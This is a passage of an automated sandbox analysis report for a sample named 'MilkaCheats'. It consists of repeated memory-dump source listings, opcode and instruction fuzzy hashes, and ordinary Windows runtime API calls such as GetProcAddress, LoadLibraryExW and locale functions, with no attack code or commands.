                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 38913a987f0a02ecbc7b952ccdf8d44e61a279966616db813175df46d1e9a2de
                                                                                              • Instruction ID: 6aa45bcafa9a56c86b7b17334b599789526cc4a0ec7196b77b8758bd15d04ec5
                                                                                              • Opcode Fuzzy Hash: 38913a987f0a02ecbc7b952ccdf8d44e61a279966616db813175df46d1e9a2de
                                                                                              • Instruction Fuzzy Hash: 4B112935B016148BCB048F58DC816EEBBF1EF5A320F680478D884A3361D334ADC2DB82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9cffc6bbf0bff478969b4cefea039ec4ad7064fec13393a93f305b22ffaf88e8
                                                                                              • Instruction ID: 6d1bc7c619090df91082f518b64185e29278bc0d1499515a106fd8ec91eca86c
                                                                                              • Opcode Fuzzy Hash: 9cffc6bbf0bff478969b4cefea039ec4ad7064fec13393a93f305b22ffaf88e8
                                                                                              • Instruction Fuzzy Hash: 3211A73BB24A3547E7A0CE76DCC462A6393FBC7216B1A0534EB85D7642C631F911E151
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6d3f3714de9450171914d34d67a690e905a18c2fe009bf4fd1b138a16d9cf573
                                                                                              • Instruction ID: f06b8db73a3e3d4bc7a021748048c46da17c39c8f104aaaa5516f8e5918096f1
                                                                                              • Opcode Fuzzy Hash: 6d3f3714de9450171914d34d67a690e905a18c2fe009bf4fd1b138a16d9cf573
                                                                                              • Instruction Fuzzy Hash: 9B110475B0D3089BC7089F64CCC16BAB3F6EB8A310F445838EA8487262D735DC96D796
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                              • Instruction ID: 2e4b98aa98885ec5740f180f908ce35c94ce60b324354217ce9c7c57b46a7410
                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                              • Instruction Fuzzy Hash: 6611E933A091E40EC3168D3C9410976BFA30AA3235F698399F4B89B2D2D7238D8E8355
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ccd4263a6600a8e6b338023b0181bc1196df4a3e081a7fe201df2049addf5b40
                                                                                              • Instruction ID: f258ff5e405d792c19cedef448aa7f5cbb729b938d26f6acf89dd649e8f41b9f
                                                                                              • Opcode Fuzzy Hash: ccd4263a6600a8e6b338023b0181bc1196df4a3e081a7fe201df2049addf5b40
                                                                                              • Instruction Fuzzy Hash: 1901D4F1B4030647E724AE14A4D1BBBF2A86F92754F09443CE90C97302DB7AEC45C2D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1de961cc74240762131b0e05e0130af0d405d24f73997a9a1bc485c01ee98b7
                                                                                              • Instruction ID: f8995caca528373af5e16c4f5f23fa845ca1645616aa26ab8656f2bb8c64e50c
                                                                                              • Opcode Fuzzy Hash: e1de961cc74240762131b0e05e0130af0d405d24f73997a9a1bc485c01ee98b7
                                                                                              • Instruction Fuzzy Hash: 9C01F23BE482608FD3258F28D8A1756FB13BBDA600F2A456CC8945B681CA355806CBC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cbdbdcb841174399dc98b2856ec4b76957b4c3d025dededcbd42d9a246898b1e
                                                                                              • Instruction ID: 54c5b770e8b0b4044f8afdc2f57e3e313f53d6d12ae121770135c500736d70a9
                                                                                              • Opcode Fuzzy Hash: cbdbdcb841174399dc98b2856ec4b76957b4c3d025dededcbd42d9a246898b1e
                                                                                              • Instruction Fuzzy Hash: 13114C719093409BE310CF20D84579BBBE5BFC6710F14891CE0D89B691DB758509CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              • Opcode Fuzzy Hash: de3b5ff09b1d0d1ae63b0a177684ffe8e07211a5b831b2f8fce72c0c22e4e9d6
                                                                                              • Instruction Fuzzy Hash: 8DB04834E182008AC3148F14D2519AAB6B6A78F201F11A12DD84C23251C23198008F29
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 520558dd20f180bea5b7d0c18e496322c3032679640e7065b26555724ee1b783
                                                                                              • Instruction ID: f8f7dfff36ee334b8041c2b8ff66e2fed51feeb52af1e9a8ebdff7ac0544a751
                                                                                              • Opcode Fuzzy Hash: 520558dd20f180bea5b7d0c18e496322c3032679640e7065b26555724ee1b783
                                                                                              • Instruction Fuzzy Hash: D0900224D581018A81088F01A450870E23B764B101E2434288009334514651D404850C
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000C6ACA
                                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000C6AD8
                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000C6AE9
                                                                                              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000C6AFA
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                              • API String ID: 667068680-1247241052
                                                                                              APIs
                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 000CA527
                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 000CA635
                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 000CA7A2
                                                                                              Similarity
                                                                                              • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 1206542248-393685449
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,865EA617,?,000D57D3,?,?,00000000,00000000), ref: 000D5787
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3664257935-537541572
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 000C6923
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 000C698E
                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C69AB
                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000C69EA
                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C6A49
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000C6A6C
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiStringWide
                                                                                              • String ID:
                                                                                              • API String ID: 2829165498-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,000CA091,000C87BA,000C795C), ref: 000CA0A8
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000CA0B6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000CA0CF
                                                                                              • SetLastError.KERNEL32(00000000,000CA091,000C87BA,000C795C), ref: 000CA121
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,865EA617,?,?,00000000,000E3DE9,000000FF,?,000D1881,?,?,000D1855,00000000), ref: 000D1926
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000D1938
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,000E3DE9,000000FF,?,000D1881,?,?,000D1855,00000000), ref: 000D195A
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 000C60E9
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C60F4
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C6162
                                                                                                • Part of subcall function 000C6245: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000C625D
                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 000C610F
                                                                                              • _Yarn.LIBCPMT ref: 000C6125
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                              • String ID:
                                                                                              • API String ID: 1088826258-0
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D73F9
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D740C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: 7r$7r
                                                                                              • API String ID: 885266447-589201516
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,000CB193,00000000,00000000,?,?,?,?,000CB2BD,00000002,FlsGetValue,000E5EB8,FlsGetValue), ref: 000CB1EF
                                                                                              • GetLastError.KERNEL32(?,000CB193,00000000,00000000,?,?,?,?,000CB2BD,00000002,FlsGetValue,000E5EB8,FlsGetValue,00000000,?,000CA14D), ref: 000CB1F9
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,000E5EB8,FlsGetValue,00000000,?,000CA14D), ref: 000CB221
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(865EA617,00000000,00000000,00000000), ref: 000D640D
                                                                                                • Part of subcall function 000DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000DA50C,?,00000000,-00000008), ref: 000DABD5
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000D6668
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000D66B0
                                                                                              • GetLastError.KERNEL32 ref: 000D6753
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                              • String ID:
                                                                                              • API String ID: 2112829910-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              APIs
                                                                                                • Part of subcall function 000DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000DA50C,?,00000000,-00000008), ref: 000DABD5
                                                                                              • GetLastError.KERNEL32 ref: 000DAFA9
                                                                                              • __dosmaperr.LIBCMT ref: 000DAFB0
                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 000DAFEA
                                                                                              • __dosmaperr.LIBCMT ref: 000DAFF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1913693674-0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 000DBEFC
                                                                                                • Part of subcall function 000DAB29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,000DA50C,?,00000000,-00000008), ref: 000DABD5
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000DBF34
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000DBF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 158306478-0
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C2043
                                                                                              • int.LIBCPMT ref: 000C2056
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 000C2B9C
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 000C2BB6
                                                                                              • std::_Facet_Register.LIBCPMT ref: 000C2089
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C209F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                              • String ID:
                                                                                              • API String ID: 459529453-0
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C1ED8
                                                                                              • int.LIBCPMT ref: 000C1EEB
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 000C2B9C
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 000C2BB6
                                                                                              • std::_Facet_Register.LIBCPMT ref: 000C1F1E
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C1F34
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                              • String ID:
                                                                                              • API String ID: 459529453-0
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C1F51
                                                                                              • int.LIBCPMT ref: 000C1F64
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 000C2B9C
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 000C2BB6
                                                                                              • std::_Facet_Register.LIBCPMT ref: 000C1F97
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C1FAD
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                              • String ID:
                                                                                              • API String ID: 459529453-0
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C1FCA
                                                                                              • int.LIBCPMT ref: 000C1FDD
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::_Lockit.LIBCPMT ref: 000C2B9C
                                                                                                • Part of subcall function 000C2B8B: std::_Lockit::~_Lockit.LIBCPMT ref: 000C2BB6
                                                                                              • std::_Facet_Register.LIBCPMT ref: 000C2010
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 000C2026
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                              • String ID:
                                                                                              • API String ID: 459529453-0
                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,000DEFE9,00000000,00000001,00000000,00000000,?,000D67A7,00000000,00000000,00000000), ref: 000E1FE8
                                                                                              • GetLastError.KERNEL32(?,000DEFE9,00000000,00000001,00000000,00000000,?,000D67A7,00000000,00000000,00000000,00000000,00000000,?,000D6D65,00000000), ref: 000E1FF4
                                                                                                • Part of subcall function 000E1FBA: CloseHandle.KERNEL32(FFFFFFFE,000E2004,?,000DEFE9,00000000,00000001,00000000,00000000,?,000D67A7,00000000,00000000,00000000,00000000,00000000), ref: 000E1FCA
                                                                                              • ___initconout.LIBCMT ref: 000E2004
                                                                                                • Part of subcall function 000E1F7C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,000E1FAB,000DEFD6,00000000,?,000D67A7,00000000,00000000,00000000,00000000), ref: 000E1F8F
                                                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,000DEFE9,00000000,00000001,00000000,00000000,?,000D67A7,00000000,00000000,00000000,00000000), ref: 000E2019
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              APIs
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 000C9EDF
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 000C9F93
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 3480331319-1018135373
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?), ref: 000CA7D2
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 2118026453-2084237596
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000C75B4
                                                                                              • ___raise_securityfailure.LIBCMT ref: 000C7671
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                              • String ID: q*
                                                                                              • API String ID: 3761405300-3148377056
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000C2364
                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000C239C
                                                                                                • Part of subcall function 000C61E0: _Yarn.LIBCPMT ref: 000C61FF
                                                                                                • Part of subcall function 000C61E0: _Yarn.LIBCPMT ref: 000C6223
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                              • String ID: bad locale name
                                                                                              • API String ID: 1908188788-1405518554